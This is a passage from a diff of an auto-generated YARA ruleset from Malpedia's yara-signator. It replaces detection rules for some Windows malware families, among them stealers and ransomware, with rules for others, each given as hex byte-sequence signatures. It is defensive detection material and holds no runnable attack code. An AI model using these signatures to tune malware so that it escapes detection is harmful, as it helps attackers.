= { 50 51 8d3c01 eb51 ff752c 8b7524 51 } - $sequence_3 = { 05eb004805 f0005005 f0005005 f0005005 f0005005 f0005005 f0005005 } - $sequence_4 = { c74424540f000000 85c0 7c16 7f04 85f6 7410 89442418 } - $sequence_5 = { 8d4c241c e8???????? c744247001000000 6a01 51 68???????? 8d4c2424 } - $sequence_6 = { e8???????? 83c404 89442428 c7842480000000ffffffff 8b4c241c 85c9 } - $sequence_7 = { 85c0 7413 6a00 8d8c24c8070000 51 8bc8 e8???????? } - $sequence_8 = { ff15???????? 85c0 0f8420010000 837e1408 7204 8b06 } - $sequence_9 = { e9???????? 8d8d50f7ffff e9???????? 8b85fcf4ffff 50 e8???????? 59 } + $sequence_0 = { 56 8bf2 57 83f8ff 7507 8bce e8???????? } + $sequence_1 = { 57 8b4808 8d7c2418 8b4004 } + $sequence_2 = { c1e202 8bfe 8bca 45 } + $sequence_3 = { 7404 c6400109 8b442430 8bd5 014608 8bcf 56 } + $sequence_4 = { eb2c 6a05 5a 8bcf } + $sequence_5 = { c6007b 40 85db 7404 c6000a 40 c60000 } + $sequence_6 = { e8???????? 8bf0 85f6 7411 8bcf } + $sequence_7 = { 85ff 7423 8b0e 8bd5 } + $sequence_8 = { e8???????? 8b742414 8bce 8b542418 89742424 e8???????? 84c0 } + $sequence_9 = { 7508 33c0 85d2 0f95c0 c3 } condition: - 7 of them and filesize <704512 + 7 of them and filesize <417792 } -rule MALPEDIA_Win_Betabot_Auto : FILE +rule MALPEDIA_Win_Cobra_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "66328af7-8459-5b35-88d1-7e63b7ee5eb4" + id = "962ae883-d522-5f88-b272-e61709553508" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.betabot_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cobra_auto.yar#L1-L488" license_url = "N/A" - logic_hash = "51b7b8c3c50a8d4a628d1b4c5d49a49007142cba41644cf909b7bfdb76b9cbc5" + logic_hash = "0f157bf0768b0eaaf80d53d6edd02f203144bcb1fce66a02d72ea93d53a8a5ec" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -165038,32 +167806,78 @@ rule MALPEDIA_Win_Betabot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85e4f7ffff 89bde8f7ffff 50 33ff 56 47 56 } - $sequence_1 = { 8d44244c 50 ff15???????? 8d442448 50 e8???????? 8d442448 } - $sequence_2 = { 32c0 e9???????? 6a40 5e e8???????? a3???????? } - $sequence_3 = { 884617 2407 80fa40 7413 80fa80 7404 } - $sequence_4 = { 85c0 7503 6afd 58 5f 5e 5b } - $sequence_5 = { c20400 55 8bec 83ec18 53 56 8365f800 } - $sequence_6 = { a1???????? 85c0 740b 8d4dfc 51 ff7508 ffd0 } - $sequence_7 = { bbb0040000 85f6 7433 a1???????? 48 50 } - $sequence_8 = { 8a460a 3cb9 740c 3c33 7408 c70302000000 eb34 } - $sequence_9 = { 7470 66397508 746a 6a02 59 ff7508 66894de8 } + $sequence_0 = { 7511 e8???????? 85c0 7508 ff15???????? } + $sequence_1 = { ff25???????? 53 56 57 8bd9 33f6 } + $sequence_2 = { 7514 391d???????? 754d 33c0 } + $sequence_3 = { 85c0 0f8e8c000000 83e801 8905???????? } + $sequence_4 = { 751c 8bcf ff15???????? 8d8fe8030000 8bf9 } + $sequence_5 = { 757f 8b05???????? 85c0 0f8e8c000000 } + $sequence_6 = { 5b c3 85db 7405 83fb03 } + $sequence_7 = { 85c0 750e 3905???????? 7e2c ff0d???????? 83f801 8b0d???????? } + $sequence_8 = { e8???????? 85c0 750e 33ff 8bc7 } + $sequence_9 = { 5f 5e 5b c3 85ff 7418 } + $sequence_10 = { 753c b980000000 e8???????? 85c0 a3???????? 7504 33c0 } + $sequence_11 = { 5e 5b c3 83fb01 7405 83fb02 } + $sequence_12 = { 33d2 b9e8030000 f7f1 83f805 } + $sequence_13 = { c9 c3 3ac8 7606 8ad1 } + $sequence_14 = { d2e0 0802 ff45f8 837df808 7c0b 8a041f 47 } + $sequence_15 = { e8???????? 83c410 85c0 7517 ff7520 ff751c } + $sequence_16 = { 7407 33c0 e9???????? ff15???????? e9???????? } + $sequence_17 = { 7f07 e8???????? eb26 83c0ff } + $sequence_18 = { e8???????? eb6d e8???????? 85c0 } + $sequence_19 = { e8???????? 33db 3bc3 741a } + $sequence_20 = { e8???????? 8bc7 eb0e 4883c108 e8???????? b801005921 } + $sequence_21 = { 85c0 7564 488b0b 488b01 } + $sequence_22 = { ff5024 488d4d08 e8???????? 488d4d08 e8???????? 488bcd } + $sequence_23 = { ff501c 488d4d08 e8???????? 498bce e8???????? 48832700 ba02000000 } + $sequence_24 = { ff5064 488b0e 4883c108 e8???????? 488b5c2430 488b6c2438 488b742440 } + $sequence_25 = { 83781400 750a b865005921 e9???????? } + $sequence_26 = { 8bec 56 6a00 6880000000 6a03 6a00 6a03 } + $sequence_27 = { 83feff 7505 33c0 5e 5d c3 8b4d08 } + $sequence_28 = { 6a03 68000000c0 50 ff15???????? 8bf0 83feff 7505 } + $sequence_29 = { 83c0fe 668b4802 83c002 663bcb 75f4 8b15???????? 8b0d???????? } + $sequence_30 = { 8908 8b0d???????? 895004 894808 33c0 } + $sequence_31 = { c3 8b4d08 57 51 6a00 } + $sequence_32 = { 6689440ffc 6685c0 75ee f685c003000010 } + $sequence_33 = { 8d45e8 50 6a00 6aff e8???????? 85c0 } + $sequence_34 = { 68???????? 51 ffd6 83c40c 6a28 } + $sequence_35 = { ff15???????? 83f87a 740b 3d230000c0 } + $sequence_36 = { 8b7d0c 3bc3 7508 3bfb } + $sequence_37 = { ff15???????? 488bcf ff15???????? 41b701 } + $sequence_38 = { 48894c2450 4c89642448 488d4c2468 48894c2440 4c89642438 } + $sequence_39 = { 75e8 85f6 74e4 418936 b801000000 4881c4480d0000 } + $sequence_40 = { 48f7d1 66837c4bfc5c 7413 488bfb 4883c9ff 66f2af 8b05???????? } + $sequence_41 = { 8d8588feffff 68???????? 50 ff15???????? 83c42c } + $sequence_42 = { b914000000 84c0 0f45f9 488bce } + $sequence_43 = { 488bce 8bd7 ff15???????? 85c0 } + $sequence_44 = { 7507 32c0 e9???????? c745b818000000 } + $sequence_45 = { 668b08 83c002 6685c9 75f5 2bc2 d1f8 66837c43fe5c } + $sequence_46 = { 05a1000000 50 8d84249c0d0000 68???????? } + $sequence_47 = { 0f8456feffff 807c241301 6800080000 0f8544020000 } + $sequence_48 = { 0f8431ffffff 8b4d08 5f 8931 } + $sequence_49 = { 0f84100f0000 6800080000 57 56 } + $sequence_50 = { 05a2000000 50 8d94249c0d0000 68???????? } + $sequence_51 = { 05a2000000 50 8d8c249c0d0000 68???????? } + $sequence_52 = { 668cc8 c3 53 50 } + $sequence_53 = { 85c0 740a b8050000c0 e9???????? } + $sequence_54 = { c745bc04390100 66c745d81800 66c745da1a00 c745dc10390100 } + $sequence_55 = { c745bc01000000 c745c000000000 6a00 6a00 8d55ac 52 } condition: - 7 of them and filesize <835584 + 7 of them and filesize <1368064 } -rule MALPEDIA_Win_Observer_Stealer_Auto : FILE +rule MALPEDIA_Win_Neteagle_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "536559c4-9574-5591-915f-4694149d7210" + id = "1db1653f-5505-5d3a-ba38-0bc41fb6ed7f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.observer_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.observer_stealer_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.neteagle_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "7a05fc963c0665c59a8fed1a8fc722896fb246e3248a23ceef5fd4c8486da3c7" + logic_hash = "6f0c75693d906262c5895d882d984643cdff0e946d0c3df9bf0f7a28d5c9d704" score = 75 quality = 75 tags = "FILE" @@ -165077,32 +167891,32 @@ rule MALPEDIA_Win_Observer_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1ea03 0fb60c02 8bc6 83e007 0fabc1 8b442414 } - $sequence_1 = { 8b5c2418 f6c301 746c 8b3e 85ff 7466 8b5e04 } - $sequence_2 = { 50 ff15???????? 8b4c2460 8d442440 50 e8???????? 8d4c2440 } - $sequence_3 = { e8???????? 68???????? 8d8d54ffffff e8???????? 68???????? 8d8d6cffffff } - $sequence_4 = { 59 eb3b 55 8b6b04 2bee c1fd02 56 } - $sequence_5 = { 85f6 740b 83feff 0f859a000000 eb6c 8b1c8d287e4300 } - $sequence_6 = { 8d8d60ffffff e8???????? 59 83781408 7202 8b00 } - $sequence_7 = { 8b442420 8918 5f 5e 5d 5b 83c40c } - $sequence_8 = { 85d2 7912 f7da e8???????? 6a2d 8d48fe 58 } - $sequence_9 = { 8d7c2468 894c2464 885c2450 ab ab ab ab } + $sequence_0 = { 8d4c2418 e8???????? 8d4c2418 e8???????? 8b84241c300000 89742410 3bc6 } + $sequence_1 = { 83c408 50 51 8d442428 } + $sequence_2 = { c68424240200000d 8bcc 8964242c 68???????? e8???????? } + $sequence_3 = { 6a00 6a00 57 56 6840800000 ff15???????? } + $sequence_4 = { c684241802000018 8bcc 89642424 8d542428 52 e8???????? 8d442420 } + $sequence_5 = { 8d4dec e8???????? 6800100000 8d4dec c645fc0d e8???????? 8b16 } + $sequence_6 = { 8d4c2428 c68424540c000006 e8???????? 8d542414 68???????? 8d442414 52 } + $sequence_7 = { c684241002000004 e8???????? 8d4e34 c684241002000005 e8???????? 8d4e38 c684241002000006 } + $sequence_8 = { 52 6a00 6a00 8b3d???????? ffd7 83f820 7f1b } + $sequence_9 = { 888c0414010000 40 3bc6 7ced 8d942414010000 8d4c240c 52 } condition: - 7 of them and filesize <614400 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Poscardstealer_Auto : FILE +rule MALPEDIA_Win_Noxplayer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "30b86ec5-11cf-5ead-8d33-f96f4fd997a4" + id = "aeae21d3-7da2-50ec-a0e6-bf9f936a4ea7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poscardstealer_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.noxplayer_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "e2bc29fc53d916c8c6261d35dc13ec4aa0c9f6d2e8252ac3a60894a094beda3f" + logic_hash = "1a7d1e8968616ef04ac90265f765d718da000484253d6b729f0bd247a60f8bd7" score = 75 quality = 75 tags = "FILE" @@ -165116,32 +167930,32 @@ rule MALPEDIA_Win_Poscardstealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c645fc01 e8???????? 8d4db8 51 50 8d55d4 } - $sequence_1 = { 33d2 bb07000000 895de8 8975e4 } - $sequence_2 = { 50 ff15???????? 8bf0 8d45b0 50 } - $sequence_3 = { 03c8 83fb10 7303 8d55d4 } - $sequence_4 = { 8bd1 c1fa05 c1e006 030495e0794200 eb05 b8???????? f6400420 } - $sequence_5 = { c785e8feffff7ce74100 8b8520ffffff c645fc07 894598 } - $sequence_6 = { 8b4da4 8b5590 8bc2 83f908 7303 } - $sequence_7 = { 885dd4 e8???????? 8b0d???????? 8b35???????? 2bce b893244992 f7e9 } - $sequence_8 = { 6800000040 50 ff15???????? 8bf0 8d45c4 50 } - $sequence_9 = { e9???????? 8d8d58feffff e9???????? 8d8d10ffffff e9???????? 8d8d48ffffff e9???????? } + $sequence_0 = { 488941b0 488b42b8 41b8a8000000 488941b8 488b42c0 488941c0 8b42c8 } + $sequence_1 = { 413bd0 7511 48ffc1 4883c004 4883f904 7ce7 32c0 } + $sequence_2 = { 4803c1 48898398000000 488b4350 488b4818 48898bb0000000 0f28742470 440f28442460 } + $sequence_3 = { e8???????? 488d542450 b904010000 ff15???????? 4c8d05403b0300 488d4c2450 ba04010000 } + $sequence_4 = { 4c8d4e34 4c8b442458 488bd6 488b4e58 e8???????? 488d5614 488b4e50 } + $sequence_5 = { 488d5557 498d4c2408 e8???????? 488bd8 488d45b7 483bd8 7422 } + $sequence_6 = { 488bf2 488bf9 488d91c0000000 488d4c2428 e8???????? 90 488dafa0000000 } + $sequence_7 = { 4c894c2470 488b4508 4c3bc8 740f 418b4918 390e 7c07 } + $sequence_8 = { 8d4801 488d93b8000000 8b02 3bc8 741b 8b83c0000000 488b8b88000000 } + $sequence_9 = { 4489642460 4c8d442458 488d542460 488bc8 e8???????? eb03 498bc5 } condition: - 7 of them and filesize <362496 + 7 of them and filesize <742400 } -rule MALPEDIA_Win_Seasalt_Auto : FILE +rule MALPEDIA_Win_Kasperagent_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e41fdf89-eed2-569c-87d1-66ae3f31eb44" + id = "31bd379d-36ff-5056-a7b4-5cc60c9344f8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.seasalt_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kasperagent_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "c4e00a9b356da4bb38f74ae93a3974f0cb2a6403defdfa59feac8c8b4bbe886d" + logic_hash = "a97fb5a8dde23a8ff235ddb0c06e57b70ba205db49e4efcaa1ba693facbe4b47" score = 75 quality = 75 tags = "FILE" @@ -165155,32 +167969,32 @@ rule MALPEDIA_Win_Seasalt_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 888800d90010 eb1f 83f861 7213 } - $sequence_1 = { a3???????? 3bc6 7513 68e0930400 ff15???????? 8975fc } - $sequence_2 = { 83d8ff 3bc3 758c b901040000 33c0 } - $sequence_3 = { f2ae a1???????? 68???????? f7d1 } - $sequence_4 = { 8b8c2454010000 6a00 8d442428 6800010000 50 } - $sequence_5 = { 6aff 50 ff15???????? 85c0 6a00 } - $sequence_6 = { 8bf7 c1e902 8bfa 8d942488010000 f3a5 } - $sequence_7 = { 7ced 55 8bac2418020000 6a00 8d442414 6804020000 50 } - $sequence_8 = { 8dbc2419020000 c684241802000000 f3ab 66ab 6a00 } - $sequence_9 = { c1e902 83e203 83f908 7229 f3a5 ff2495c8350010 8bc7 } + $sequence_0 = { 84c0 741e 8bd6 57 52 e8???????? } + $sequence_1 = { ffb4b5b4fdffff 8b95ccfdffff 8b8dd8fdffff e8???????? 59 3bc3 } + $sequence_2 = { 83c404 8bd8 83caff f00fc117 } + $sequence_3 = { 33c9 894c2430 894c2434 894c2438 894c243c 85c0 7463 } + $sequence_4 = { 8d742410 8d442408 c7470800000000 894c240c e8???????? 84c0 } + $sequence_5 = { 7cb4 8b4c2414 8b01 3b70f8 } + $sequence_6 = { 66390c78 7535 84db 7524 } + $sequence_7 = { 8b50f4 52 50 e8???????? 5d } + $sequence_8 = { 7419 8d642400 3bfa 7311 } + $sequence_9 = { 8d3451 33ff 3bce 7419 8d642400 3bfa } condition: - 7 of them and filesize <139264 + 7 of them and filesize <1605632 } -rule MALPEDIA_Win_Aytoke_Auto : FILE +rule MALPEDIA_Win_Lunchmoney_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f1478c56-9c46-5623-bd25-6c48e27a19e0" + id = "8af393b3-e0ee-5b29-9ae9-6b5b0b5bb360" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aytoke_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lunchmoney_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "7de9f368c79cc6db2fb2092fd19a4e0bd2fcaaf4a3ec4500b832560e5022850b" + logic_hash = "4e3c0ce49996288518b2f9a0e709877b3f945a71128e29da2214bd53e19246e9" score = 75 quality = 75 tags = "FILE" @@ -165194,32 +168008,32 @@ rule MALPEDIA_Win_Aytoke_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6685c9 75e9 e9???????? 33c0 8bff 0fb788103a4100 66898c05fcfdffff } - $sequence_1 = { 3c58 770f 0fbec2 0fbe80f83b4100 83e00f eb02 33c0 } - $sequence_2 = { 8bd0 83e01f c1fa05 8b149500c44100 59 c1e006 59 } - $sequence_3 = { 56 e8???????? c1f805 56 8d3c8500c44100 e8???????? 83e01f } - $sequence_4 = { 90 68???????? e8???????? a1???????? 46 83c004 } - $sequence_5 = { 2bc2 bb5c000000 85c0 7e16 } - $sequence_6 = { be01000000 83c104 83c408 3bce } - $sequence_7 = { 33c0 8d642400 0fb7888c3a4100 66898c05fcfdffff 83c002 6685c9 75e9 } - $sequence_8 = { 85ff 7424 56 53 6a01 57 } - $sequence_9 = { 663bc1 0f85cc130000 8d95fcfcffff 52 ff15???????? 68a0000000 } + $sequence_0 = { 8b4304 8d4b0c 83791408 8945dc 8b4308 8945e0 7202 } + $sequence_1 = { 7405 e8???????? a900000080 751f d9fa 833d????????00 0f85f38b0000 } + $sequence_2 = { c1e60a 56 e8???????? 56 8bf8 6a00 57 } + $sequence_3 = { 53 8d4d08 e8???????? 83f8ff 750e 68???????? } + $sequence_4 = { 8d4dd4 e8???????? 83f8ff 742d 6aff 40 } + $sequence_5 = { 7420 53 8d85dcfeffff 50 } + $sequence_6 = { ff7580 e8???????? 8b8568ffffff 014588 59 83957cffffff00 837d0800 } + $sequence_7 = { 8bcf e8???????? 837f1408 8bc8 } + $sequence_8 = { 8bc3 e8???????? c3 53 56 8bf1 57 } + $sequence_9 = { 8d86f8000000 83c124 3bc8 740a 6aff 6a00 50 } condition: - 7 of them and filesize <425984 + 7 of them and filesize <373760 } -rule MALPEDIA_Win_Bluehaze_Auto : FILE +rule MALPEDIA_Win_Hamweq_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b806577a-57c1-570d-aa1c-22fa8aae198a" + id = "5d79f276-5807-56d4-9ea0-44042b180646" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bluehaze_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hamweq_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "e848ac1af15ccfaaa261b6df2c92e0cbc62750d10a2cd1c781f26efdf23885e7" + logic_hash = "f4464ade23ea171530cd0c6e2b15abfaf45c0eb2379ccacb80bd385a306f9a8e" score = 75 quality = 75 tags = "FILE" @@ -165233,32 +168047,32 @@ rule MALPEDIA_Win_Bluehaze_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85f0feffff 50 8bcf ff15???????? 8b08 8b4904 } - $sequence_1 = { 745f 6a30 c7460800000000 e8???????? 83c404 85c0 } - $sequence_2 = { 0fbe56ff 4e 51 52 57 ffd3 83c40c } - $sequence_3 = { e8???????? 83c408 8bc8 ff15???????? 397314 7204 } - $sequence_4 = { 8d4f04 894e30 894e34 8d4708 8d4d10 894610 894614 } - $sequence_5 = { 68???????? 64a100000000 50 81ecec050000 a1???????? 33c5 8945ec } - $sequence_6 = { 83c420 8d14c500000000 2bd0 8b06 5b 8d0cd0 } - $sequence_7 = { 03c2 894508 753d 8b4604 8b0e 3bc8 0f8466010000 } - $sequence_8 = { 0b0b 010b 0b0b 0b0b 0b0b 0b0b 0b0b } - $sequence_9 = { 33db 8bc7 8bf1 c745e80f000000 895de4 885dd4 8d5001 } + $sequence_0 = { 53 51 8b4e08 8945f8 ffb148010000 ff5044 } + $sequence_1 = { 8d85e4f1ffff 50 ff5744 50 } + $sequence_2 = { 837c910800 8d449108 894514 0f8438010000 837c910c00 } + $sequence_3 = { 668b4804 51 ff30 56 e8???????? 83c40c } + $sequence_4 = { 51 ff5040 8b0e 8d85ecfeffff 53 50 } + $sequence_5 = { 7504 6afe ebea 8b4e08 8b06 ff7170 } + $sequence_6 = { 8d4580 8b0b 50 ff5154 } + $sequence_7 = { 8b06 753c ffb1d8000000 8d8d00feffff 51 } + $sequence_8 = { 51 8d4d80 51 ff5054 eb12 8b5d08 } + $sequence_9 = { c3 8b442408 8a08 84c9 7408 } condition: - 7 of them and filesize <424960 + 7 of them and filesize <24576 } -rule MALPEDIA_Win_Mechanical_Auto : FILE +rule MALPEDIA_Win_Kuluoz_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2ebc8e2c-9656-5fd5-9240-713f089f8d21" + id = "5fb3985a-aeab-550e-a023-7a6297ba36e6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mechanical_auto.yar#L1-L158" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kuluoz_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "0d673fb1f58f38008ae08ad0a2913e65568b1230b5de3947ba7af4a4e448c6f0" + logic_hash = "50bc1e4e578c80bb3ef2f204a6ac7dc8f957cf6ffcd8541a192712c749d0e03e" score = 75 quality = 75 tags = "FILE" @@ -165272,38 +168086,32 @@ rule MALPEDIA_Win_Mechanical_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 03c7 3bca 72ed 5f } - $sequence_1 = { c6025e eb12 c6022f eb0d } - $sequence_2 = { 8b442430 488d8c2471110000 33d2 41b803010000 } - $sequence_3 = { 0401 3cbe 8844240b 76e2 } - $sequence_4 = { 03ce c6840c3801000000 8d8424a05c0000 33f6 } - $sequence_5 = { 033485c0e54200 c745e401000000 33db 395e08 } - $sequence_6 = { 488d15d9d20000 488bcb e8???????? 85c0 750a 4883c310 } - $sequence_7 = { 00686c 42 0023 d18a0688078a } - $sequence_8 = { 4488a424300d0000 488905???????? e8???????? 4c8d1d5cd40100 498bcc } - $sequence_9 = { eb62 c6023d eb5d c6025f eb58 c6023a } - $sequence_10 = { 03c1 1bc9 0bc1 59 e9???????? e8???????? ff742404 } - $sequence_11 = { 41c1c90d 8bca 4983c201 4403c8 493bc8 } - $sequence_12 = { 033485c0e54200 8b45e4 8b00 8906 } - $sequence_13 = { 030495c0e54200 eb05 b8???????? f6400420 } - $sequence_14 = { 33d2 41b803010000 4488a42470110000 488905???????? e8???????? } - $sequence_15 = { 3c58 7711 480fbec5 428a8c10507c0200 83e10f eb03 } + $sequence_0 = { 6a00 6a00 8b45cc 50 ff55ec 8945c8 837dc800 } + $sequence_1 = { 52 8b45fc 8b4840 51 e8???????? 83c40c 8b55fc } + $sequence_2 = { 83c001 8b4d0c 898146120000 837dfc04 7552 } + $sequence_3 = { 8b4508 50 8d4dd8 51 e8???????? 8b10 } + $sequence_4 = { 338df4feffff 8985f0feffff 898df4feffff 68ff000000 8d95f8feffff 52 e8???????? } + $sequence_5 = { 7502 eb05 e9???????? 837dfc06 0f84a2000000 837dfc04 7552 } + $sequence_6 = { 83fa0a 7409 0fbe4508 83f80d 7504 b001 } + $sequence_7 = { 8b45fc 0fb60c02 51 e8???????? 0fbed0 3bf2 7404 } + $sequence_8 = { 8bec 81ec780a0000 a1???????? 33c5 8945fc } + $sequence_9 = { f7f1 0fbe9204605009 8b45f8 0345fc 0fbe08 } condition: - 7 of them and filesize <434176 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Gpcode_Auto : FILE +rule MALPEDIA_Win_Auriga_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d8b81e5a-8691-5b0a-9c29-2fe185a250cc" + id = "3e414b5e-c2de-5c81-b4bc-c099cfe4cd7e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gpcode_auto.yar#L1-L188" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.auriga_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "47d13f6f4636c7a610d9f5f6fa6bfc46db8fee0da3e7f134864d9085143c9558" + logic_hash = "cddd7158b581ccab9be1a01dbee785ac04d84e6e50041126742a64808d1b3062" score = 75 quality = 75 tags = "FILE" @@ -165317,43 +168125,34 @@ rule MALPEDIA_Win_Gpcode_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? a1???????? a3???????? 6800001000 68???????? ff35???????? } - $sequence_1 = { 68???????? e8???????? 91 6a00 } - $sequence_2 = { e8???????? e8???????? c705????????01000000 c3 55 8bec } - $sequence_3 = { 85c0 7479 33c0 50 50 6a03 50 } - $sequence_4 = { ff35???????? 68???????? ff75f8 ff15???????? 8945f4 85c0 7425 } - $sequence_5 = { 8906 83c608 e2e6 59 e2dc } - $sequence_6 = { 83c40c 8d45fc 50 8d450c ff30 e8???????? } - $sequence_7 = { e8???????? 0bc0 7504 33c0 c9 c3 8945f0 } - $sequence_8 = { c60000 2d???????? 50 8d85e8feffff 50 68???????? } - $sequence_9 = { 68???????? 6a00 e8???????? 6a0a 68???????? 6a00 e8???????? } - $sequence_10 = { e8???????? 83f8ff 7505 5a } - $sequence_11 = { 001438 eb06 80c107 000c38 } - $sequence_12 = { 0005???????? 0fb605???????? 8ad3 8d80b8fee014 } - $sequence_13 = { 0016 40 3bc3 72de } - $sequence_14 = { 0145f0 8b4df0 3b4d14 0f8263feffff } - $sequence_15 = { 000c38 40 3b45f8 72e3 } - $sequence_16 = { 0144240c 85f6 7fdd 33c0 } - $sequence_17 = { 0106 eb94 55 8bec } - $sequence_18 = { 000e eb08 02c9 b2f9 } + $sequence_0 = { 90 5f bb???????? 81eb???????? 2bfb 8bf7 e8???????? } + $sequence_1 = { 755b 817e0c03001200 7552 57 } + $sequence_2 = { e8???????? c9 c20c00 ffb508fcffff 8b8504fcffff 8d8405fcfbffff } + $sequence_3 = { 4a 3bda 745e 7345 2bd3 } + $sequence_4 = { 7408 8b0d???????? 8908 56 8b7508 837e0400 7422 } + $sequence_5 = { 53 53 6a01 6a01 56 ff15???????? 8945dc } + $sequence_6 = { 84c0 7511 ff7510 ff15???????? } + $sequence_7 = { ff45fc 8b4dec ff4df8 2bcb 295df4 ff45f8 } + $sequence_8 = { ffd3 8b45fc 85c0 7539 ff750c 8d45f4 } + $sequence_9 = { 8b85e8fbffff 85c0 7566 ffb5ecfbffff 8d85f0fbffff } condition: - 7 of them and filesize <761856 + 7 of them and filesize <75776 } -rule MALPEDIA_Win_Dustman_Auto : FILE +rule MALPEDIA_Win_Colony_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "36b1ddf2-cf7c-571e-9cd1-f2576b628e0f" + id = "2ec04e04-70c5-5f61-acc9-0f96a006c29a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dustman_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.colony_auto.yar#L1-L225" license_url = "N/A" - logic_hash = "7655ffd1fc19c69013d45a561f004630940d9eb32b369648a9a2d4d61dad6d9e" + logic_hash = 